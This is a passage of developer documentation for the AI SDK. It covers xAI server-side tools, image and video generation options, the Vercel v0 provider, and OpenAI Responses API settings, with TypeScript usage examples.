allowedXHandles. -
fromDate string
Start date for posts in ISO8601 format (
YYYY-MM-DD). -
toDate string
End date for posts in ISO8601 format (
YYYY-MM-DD). -
enableImageUnderstanding boolean
Enable the model to view and analyze images in X posts.
-
enableVideoUnderstanding boolean
Enable the model to view and analyze videos in X posts.
Code Execution Tool
The code execution tool enables the model to write and execute Python code for calculations and data analysis:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt:
'Calculate the compound interest for $10,000 at 5% annually for 10 years',
tools: {
code_execution: xai.tools.codeExecution(),
},
});
View Image Tool
The view image tool enables the model to view and analyze images:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Describe what you see in the image',
tools: {
view_image: xai.tools.viewImage(),
},
});
View X Video Tool
The view X video tool enables the model to view and analyze videos from X (Twitter) posts:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Summarize the content of this X video',
tools: {
view_x_video: xai.tools.viewXVideo(),
},
});
MCP Server Tool
The MCP server tool enables the model to connect to remote Model Context Protocol (MCP) servers and use their tools:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Use the weather tool to check conditions in San Francisco',
tools: {
weather_server: xai.tools.mcpServer({
serverUrl: 'https://example.com/mcp',
serverLabel: 'weather-service',
serverDescription: 'Weather data provider',
allowedTools: ['get_weather', 'get_forecast'],
}),
},
});
MCP Server Parameters
-
serverUrl string (required)
The URL of the remote MCP server.
-
serverLabel string
A label to identify the MCP server.
-
serverDescription string
A description of what the MCP server provides.
-
allowedTools string[]
List of tool names that the model is allowed to use from the MCP server. If not specified, all tools are allowed.
-
headers Record<string, string>
Custom headers to include when connecting to the MCP server.
-
authorization string
Authorization header value for authenticating with the MCP server (e.g.,
'Bearer token123').
File Search Tool
The file search tool enables searching through documents stored in xAI vector stores (collections):
import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';
const result = streamText({
model: xai.responses('grok-4.20-reasoning'),
prompt: 'What documents do you have access to?',
tools: {
file_search: xai.tools.fileSearch({
vectorStoreIds: ['collection_your-collection-id'],
maxNumResults: 10,
}),
},
providerOptions: {
xai: {
include: ['file_search_call.results'],
} satisfies XaiLanguageModelResponsesOptions,
},
});
File Search Parameters
-
vectorStoreIds string[] (required)
The IDs of the vector stores (collections) to search.
-
maxNumResults number
The maximum number of results to return from the search.
Provider Options for File Search
-
include Array<'file_search_call.results'>
Include file search results in the response. When set to
['file_search_call.results'], the response will contain the actual search results with file content and scores.
Multiple Tools
You can combine multiple server-side tools for comprehensive research:
import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';
const { fullStream } = streamText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Research AI safety developments and calculate risk metrics',
tools: {
web_search: xai.tools.webSearch(),
x_search: xai.tools.xSearch(),
code_execution: xai.tools.codeExecution(),
file_search: xai.tools.fileSearch({
vectorStoreIds: ['collection_your-documents'],
}),
data_service: xai.tools.mcpServer({
serverUrl: 'https://data.example.com/mcp',
serverLabel: 'data-service',
}),
},
});
for await (const part of fullStream) {
if (part.type === 'text-delta') {
process.stdout.write(part.text);
} else if (part.type === 'source' && part.sourceType === 'url') {
console.log('\nSource:', part.url);
}
}
Provider Options
The Responses API supports the following provider options:
import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
providerOptions: {
xai: {
reasoningEffort: 'high',
} satisfies XaiLanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
-
reasoningEffort 'low' | 'medium' | 'high'
Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.
-
logprobs boolean
Return log probabilities for output tokens.
-
topLogprobs number
Number of most likely tokens to return per token position (0-8). When set,
logprobs is automatically enabled. -
include Array<'file_search_call.results'>
Specify additional output data to include in the model response. Use
['file_search_call.results'] to include file search results with scores and content. -
store boolean
Whether to store the input message(s) and model response for later retrieval. Defaults to
true. -
previousResponseId string
The ID of the previous response from the model. You can use it to continue a conversation.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Reasoning |
|---|---|---|---|---|---|
| grok-4.20-reasoning | | | | | |
| grok-4.20-non-reasoning | | | | | |
| grok-4-1-fast-reasoning | | | | | |
| grok-4-1-fast-non-reasoning | | | | | |
| grok-4-1 | | | | | |
| grok-4-fast-reasoning | | | | | |
| grok-4-fast-non-reasoning | | | | | |
| grok-code-fast-1 | | | | | |
| grok-3 | | | | | |
| grok-3-mini | | | | | |
Image Models
You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: 'A futuristic cityscape at sunset',
});
Image Editing
xAI supports image editing through the grok-imagine-image model. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
});
Multi-Image Editing
Combine or reference multiple input images in the prompt:
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Combine these two animals into a group photo',
images: [cat, dog],
},
});
Style Transfer
Apply artistic styles to an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Transform this into a watercolor painting style',
images: [imageBuffer],
},
aspectRatio: '1:1',
});
Image Provider Options
You can customize the image generation behavior with provider-specific settings via providerOptions.xai:
import { xai, type XaiImageModelOptions } from '@ai-sdk/xai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: xai.image('grok-imagine-image-pro'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
xai: {
resolution: '2k',
quality: 'high',
} satisfies XaiImageModelOptions,
},
});
-
resolution '1k' | '2k'
Output resolution. 1k produces ~1024×1024 images, 2k produces ~2048×2048 images (actual dimensions vary based on aspect ratio). Available for grok-imagine-image-pro. -
quality 'low' | 'medium' | 'high'
Image quality level. Higher quality may increase generation time.
Image Model Capabilities
| Model | Resolution | Aspect Ratios | Image Editing |
|---|---|---|---|
| grok-imagine-image-pro | 1k, 2k | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto | |
| grok-imagine-image | 1k | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto | |
Video Models
You can create xAI video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
This provider supports standard video generation from text prompts or image input, plus explicit video editing, video extension, and reference-to-video (R2V) operations.
Text-to-Video
Generate videos from text prompts:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'A chicken flying into the sunset in the style of 90s anime.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
xai: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Generation with Image Input
Generate videos using an image as the starting frame with an optional text prompt. This uses the standard generation path rather than a separate provider mode:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: {
image: 'https://example.com/start-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
xai: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Video Editing
Edit an existing video using a text prompt by providing a source video URL via provider options:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Give the person sunglasses and a hat',
providerOptions: {
xai: {
mode: 'edit-video',
videoUrl: 'https://example.com/source-video.mp4',
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Chaining and Concurrent Edits
The xAI-hosted video URL is available in providerMetadata.xai.videoUrl.
You can use it to chain sequential edits or branch into concurrent edits
using Promise.all:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const providerOptions = {
xai: {
mode: 'edit-video',
videoUrl: 'https://example.com/source-video.mp4',
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
};
// Step 1: Apply an initial edit
const step1 = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Add a party hat to the person',
providerOptions,
});
// Get the xAI-hosted URL from provider metadata
const step1VideoUrl = step1.providerMetadata?.xai?.videoUrl as string;
// Step 2: Apply two more edits concurrently, building on step 1
const [withSunglasses, withScarf] = await Promise.all([
generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Add sunglasses',
providerOptions: {
xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
},
}),
generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Add a scarf',
providerOptions: {
xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
},
}),
]);
Video Extension
Extend an existing video from its last frame. The duration controls the length of the extension only, not the total output. The output inherits aspectRatio and resolution from the source video.
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
// Step 1: Generate a source video
const source = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'A cat sitting on a sunlit windowsill, tail gently swishing.',
duration: 5,
aspectRatio: '16:9',
providerOptions: {
xai: {
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
const sourceUrl = source.providerMetadata?.xai?.videoUrl as string;
// Step 2: Extend the video with a new scene
const extended = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'The cat turns its head, notices a butterfly, and leaps off.',
duration: 6,
providerOptions: {
xai: {
mode: 'extend-video',
videoUrl: sourceUrl,
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
Reference-to-Video (R2V)
Provide reference images to guide the video's style and content. Unlike image-to-video, reference images are not used as the first frame — the model incorporates their visual elements into the generated video. Each reference image can be a public HTTPS URL or a base64 data URI.
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt:
'The comic cat from <IMAGE_1> and the comic dog from <IMAGE_2> ' +
'are having a playful chase through a sunlit park. ' +
'Cinematic slow-motion, warm afternoon light.',
duration: 8,
aspectRatio: '16:9',
providerOptions: {
xai: {
mode: 'reference-to-video',
referenceImageUrls: [
'https://example.com/comic-cat.png',
'https://example.com/comic-dog.png',
],
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
Use <IMAGE_1>, <IMAGE_2>, etc. in your prompt to reference specific images. Up to 7 reference images are supported per request.
Video Provider Options
The following provider options are available via providerOptions.xai.
You can validate the provider options using the XaiVideoModelOptions type.
-
pollIntervalMs number
Polling interval in milliseconds for checking task status. Defaults to 5000.
-
pollTimeoutMs number
Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
-
resolution '480p' | '720p'
Video resolution. When using the SDK's standard resolution parameter, 1280x720 maps to 720p and 854x480 maps to 480p. Use this provider option to pass the native format directly. -
mode 'edit-video' | 'extend-video' | 'reference-to-video'
Selects the explicit video operation. Each mode is mutually exclusive:
- 'edit-video' — edit an existing video (requires videoUrl)
- 'extend-video' — extend a video from its last frame (requires videoUrl)
- 'reference-to-video' — generate from reference images (requires referenceImageUrls)
When omitted, standard generation is used. Legacy inputs are still auto-detected from fields for backward compatibility.
-
videoUrl string
URL of a source video. Used with
mode: 'edit-video' for video editing and mode: 'extend-video' for video extension. -
referenceImageUrls string[]
Array of reference image URLs (1–7 images) or base64 data URIs for reference-to-video (R2V) generation. The model incorporates visual elements from these images without using them as the first frame. Use
<IMAGE_1>, <IMAGE_2>, etc. in the prompt to reference specific images. Used with mode: 'reference-to-video'.
Aspect Ratio and Resolution
For text-to-video, you can specify both aspectRatio and resolution.
The default aspect ratio is 16:9 and the default resolution is 480p.
For image-to-video, the output defaults to the input image's aspect ratio.
If you specify aspectRatio, it will override this and stretch the image to the
desired ratio.
For video editing, the output matches the input video's aspect ratio and
resolution. Custom duration, aspectRatio, and resolution are not
supported — the output resolution is capped at 720p (e.g., a 1080p input
will be downsized to 720p).
For video extension, the output inherits aspectRatio and resolution
from the source video. duration is supported and controls only the
extension length.
For reference-to-video (R2V), you can specify duration, aspectRatio,
and resolution just like text-to-video.
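For example, a text-to-video sketch that sets both explicitly (values illustrative):
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A paper boat drifting down a rainy street at night.',
  aspectRatio: '9:16',
  duration: 5,
  providerOptions: {
    xai: {
      resolution: '720p', // native format; the SDK's 1280x720 maps to this
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});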
Video Model Capabilities
| Model | Duration | Aspect Ratios | Resolution | Image-to-Video | Editing | Extension | R2V |
|---|---|---|---|---|---|---|---|
| grok-imagine-video | 1–15s | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3 | 480p, 720p | | | | |
title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.
Vercel Provider
The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.
You can create your Vercel API key at v0.dev.
Features
- Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
- Auto-fix: Identifies and corrects common coding issues during generation
- Quick edit: Streams inline edits as they're available
- Multimodal: Supports both text and image inputs
Setup
The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:
pnpm add @ai-sdk/vercel
Provider Instance
You can import the default provider instance vercel from @ai-sdk/vercel:
import { vercel } from '@ai-sdk/vercel';
If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:
import { createVercel } from '@ai-sdk/vercel';
const vercel = createVercel({
apiKey: process.env.VERCEL_API_KEY ?? '',
});
You can use the following optional settings to customize the Vercel provider instance:
-
baseURL string
Use a different URL prefix for API calls. The default prefix is
https://api.v0.dev/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the VERCEL_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';
const { text } = await generateText({
model: vercel('v0-1.5-md'),
prompt: 'Create a Next.js AI chatbot',
});
Vercel language models can also be used in the streamText function (see AI SDK Core).
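As a minimal streaming sketch:
import { vercel } from '@ai-sdk/vercel';
import { streamText } from 'ai';
const result = streamText({
  model: vercel('v0-1.5-md'),
  prompt: 'Create a Next.js AI chatbot',
});
// print the text as it streams in
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}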
Models
v0-1.5-md
The v0-1.5-md model is for everyday tasks and UI generation.
v0-1.5-lg
The v0-1.5-lg model is for advanced thinking or reasoning.
v0-1.0-md (legacy)
The v0-1.0-md model is the legacy model served by the v0 API.
All v0 models have the following capabilities:
- Supports text and image inputs (multimodal)
- Supports function/tool calls
- Streaming responses with low latency
- Optimized for frontend and full-stack web development
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| v0-1.5-md | | | | |
| v0-1.5-lg | | | | |
| v0-1.0-md | | | | |
title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.
OpenAI Provider
The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.
Setup
The OpenAI provider is available in the @ai-sdk/openai module. You can install it with
pnpm add @ai-sdk/openai
Provider Instance
You can import the default provider instance openai from @ai-sdk/openai:
import { openai } from '@ai-sdk/openai';
If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:
import { createOpenAI } from '@ai-sdk/openai';
const openai = createOpenAI({
// custom settings, e.g.
headers: {
'header-name': 'header-value',
},
});
You can use the following optional settings to customize the OpenAI provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.openai.com/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the OPENAI_API_KEY environment variable. -
name string
The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to
openai. -
organization string
OpenAI Organization.
-
project string
OpenAI project.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
The OpenAI provider instance is a function that you can invoke to create a language model:
const model = openai('gpt-5');
It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:
const model = openai('gpt-5', {
// additional settings
});
The available options depend on the API that's automatically chosen for the model (see below).
If you want to explicitly select a specific model API, you can use .responses, .chat, or .completion.
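For example (model IDs illustrative):
const responsesModel = openai.responses('gpt-5');
const chatModel = openai.chat('gpt-4o');
const completionModel = openai.completion('gpt-3.5-turbo-instruct');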
Example
You can use OpenAI language models to generate text with the generateText function:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Responses Models
You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).
const model = openai('gpt-5');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAILanguageModelResponsesOptions type.
import { openai, OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'), // or openai.responses('gpt-5')
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAILanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
-
parallelToolCalls boolean Whether to use parallel tool calls. Defaults to
true. -
store boolean
Whether to store the generation. Defaults to
true. -
maxToolCalls integer The maximum number of total calls to built-in tools that can be processed in a response. This maximum number applies across all built-in tool calls, not per individual tool. Any further attempts to call a tool by the model will be ignored.
-
metadata Record<string, string> Additional metadata to store with the generation.
-
conversation string The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with
previousResponseId. Defaults to undefined. -
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to
undefined. -
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the
previousResponseId option. Defaults to undefined. -
logprobs boolean | number Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to
true returns the log probabilities of the tokens that were generated. Setting to a number (1-20) returns the log probabilities of the top n tokens that were generated. -
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to
undefined. -
reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' Reasoning effort for reasoning models. Defaults to
medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
-
reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to
'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as reasoning parts and in non-streaming responses within the reasoning field. -
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to
true.
-
serviceTier 'auto' | 'flex' | 'priority' | 'default' Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).
Defaults to 'auto'.
-
textVerbosity 'low' | 'medium' | 'high' Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to
'medium'. -
include Array<string> Specifies additional content to include in the response. Supported values:
['file_search_call.results'] for including file search results in responses. ['message.output_text.logprobs'] for logprobs. Defaults to undefined. -
truncation string The truncation strategy to use for the model response.
- auto: If the input to this Response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
- disabled (default): If the input size will exceed the context window size for a model, the request will fail with a 400 error.
-
promptCacheKey string A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
-
promptCacheRetention 'in_memory' | '24h' The retention policy for the prompt cache. Set to
'24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models. -
safetyIdentifier string A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
-
systemMessageMode 'system' | 'developer' | 'remove' Controls the role of the system message when making requests. By default (when omitted), for models that support reasoning the
system message is automatically converted to a developer message. Setting systemMessageMode to system passes the system message as a system-level instruction; developer passes it as a developer message; remove omits the system message from the request. -
forceReasoning boolean Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults
systemMessageMode to developer unless overridden. -
contextManagement Array<object> Enable server-side context management (compaction). When configured, the server automatically compresses conversation context when token usage crosses a specified threshold. Each object in the array should have:
- type: 'compaction'
- compactThreshold: number — the token count at which compaction is triggered
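As a sketch, the configuration shape looks like this (threshold value illustrative):
providerOptions: {
  openai: {
    contextManagement: [{ type: 'compaction', compactThreshold: 100000 }],
  } satisfies OpenAILanguageModelResponsesOptions,
},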
The OpenAI responses provider also returns provider-specific metadata:
For Responses models, you can type this metadata using OpenaiResponsesProviderMetadata:
import { openai, type OpenaiResponsesProviderMetadata } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
});
const providerMetadata = result.providerMetadata as
| OpenaiResponsesProviderMetadata
| undefined;
const { responseId, logprobs, serviceTier } = providerMetadata?.openai ?? {};
// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);
The following OpenAI-specific metadata may be returned:
- responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
- logprobs (optional) Log probabilities of output tokens (when enabled).
- serviceTier (optional) Service tier information returned by the API.
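For example, a minimal sketch that reads responseId from one call and continues the conversation via previousResponseId:
import {
  openai,
  type OpenaiResponsesProviderMetadata,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const first = await generateText({
  model: openai('gpt-5'),
  prompt: 'My name is Ada. Remember it.',
});
const meta = first.providerMetadata as OpenaiResponsesProviderMetadata | undefined;
const responseId = meta?.openai?.responseId;
const second = await generateText({
  model: openai('gpt-5'),
  prompt: 'What is my name?',
  providerOptions: {
    openai: {
      // continue the stored conversation from the first response
      previousResponseId: responseId ?? undefined,
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});
console.log(second.text);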
Reasoning Output
For reasoning models like gpt-5, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning-delta') {
console.log(`Reasoning: ${part.text}`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.text);
}
}
For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'auto',
} satisfies OpenAILanguageModelResponsesOptions,
},
});
console.log('Reasoning:', result.reasoning);
Learn more about reasoning summaries in the OpenAI documentation.
WebSocket Transport
OpenAI's WebSocket API keeps a persistent connection open, which can significantly reduce Time-to-First-Byte (TTFB) in agentic workflows with many tool calls. After the initial connection, subsequent requests skip TCP/TLS/HTTP negotiation entirely.
The ai-sdk-openai-websocket-fetch
package provides a drop-in fetch replacement that routes streaming requests
through a persistent WebSocket connection.
pnpm add ai-sdk-openai-websocket-fetch
Pass the WebSocket fetch to createOpenAI via the fetch option:
import { createOpenAI } from '@ai-sdk/openai';
import { createWebSocketFetch } from 'ai-sdk-openai-websocket-fetch';
import { streamText } from 'ai';
// Create a WebSocket-backed fetch instance
const wsFetch = createWebSocketFetch();
const openai = createOpenAI({ fetch: wsFetch });
const result = streamText({
model: openai('gpt-4.1-mini'),
prompt: 'Hello!',
tools: {
// ...
},
onFinish: () => wsFetch.close(), // close the WebSocket when done
});
The first request will be slower because it must establish the WebSocket connection (DNS + TCP + TLS + WebSocket upgrade). After that, subsequent steps in a multi-step tool-calling loop reuse the open connection, resulting in lower TTFB per step.
You can see a live side-by-side comparison of HTTP vs WebSocket streaming performance in the demo app.
Verbosity Control
You can control the length and detail of model responses using the textVerbosity parameter:
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5-mini'),
prompt: 'Write a poem about a boy and his first pet dog.',
providerOptions: {
openai: {
textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
} satisfies OpenAILanguageModelResponsesOptions,
},
});
The textVerbosity parameter scales output length without changing the underlying prompt:
- 'low': Produces terse, minimal responses
- 'medium': Balanced detail (default)
- 'high': Verbose responses with comprehensive detail
Web Search Tool
The OpenAI responses API supports web search through the openai.tools.webSearch tool.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search: openai.tools.webSearch({
// optional configuration:
externalWebAccess: true,
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
filters: {
allowedDomains: ['sfchronicle.com', 'sfgate.com'],
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search' },
});
// URL sources directly from `results`
const sources = result.sources;
// Or access sources from tool results
for (const toolResult of result.toolResults) {
if (toolResult.toolName === 'web_search') {
console.log('Query:', toolResult.output.action.query);
console.log('Sources:', toolResult.output.sources);
// `sources` is an array of object: { type: 'url', url: string }
}
}
The web search tool supports the following configuration options:
- externalWebAccess boolean - Whether to use external web access for fetching live content. Defaults to true.
- searchContextSize 'low' | 'medium' | 'high' - Controls the amount of context used for the search. Higher values provide more comprehensive results but may have higher latency and cost.
- userLocation - Optional location information to provide geographically relevant results. Includes type (always 'approximate'), country, city, region, and timezone.
- filters - Optional filter configuration to restrict search results.
- allowedDomains string[] - Array of allowed domains for the search. Subdomains of the provided domains are automatically included.
For detailed information on configuration options see the OpenAI Web Search Tool documentation.
File Search Tool
The OpenAI responses API supports file search through the openai.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: openai.tools.fileSearch({
vectorStoreIds: ['vs_123'],
// configuration below is optional:
maxNumResults: 5,
filters: {
key: 'author',
type: 'eq',
value: 'Jane Smith',
},
ranking: {
ranker: 'auto',
scoreThreshold: 0.5,
},
}),
},
providerOptions: {
openai: {
// optional: include results
include: ['file_search_call.results'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
The file search tool supports filtering with both comparison and compound filters:
Comparison filters - Filter by a single attribute:
- eq - Equal to
- ne - Not equal to
- gt - Greater than
- gte - Greater than or equal to
- lt - Less than
- lte - Less than or equal to
- in - Value is in array
- nin - Value is not in array
// Single comparison filter
filters: { key: 'year', type: 'gte', value: 2023 }
// Filter with array values
filters: { key: 'status', type: 'in', value: ['published', 'reviewed'] }
Compound filters - Combine multiple filters with and or or:
// Compound filter with AND
filters: {
type: 'and',
filters: [
{ key: 'author', type: 'eq', value: 'Jane Smith' },
{ key: 'year', type: 'gte', value: 2023 },
],
}
// Compound filter with OR
filters: {
type: 'or',
filters: [
{ key: 'department', type: 'eq', value: 'Engineering' },
{ key: 'department', type: 'eq', value: 'Research' },
],
}
Image Generation Tool
OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
You can use the image tool with either generateText or streamText:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
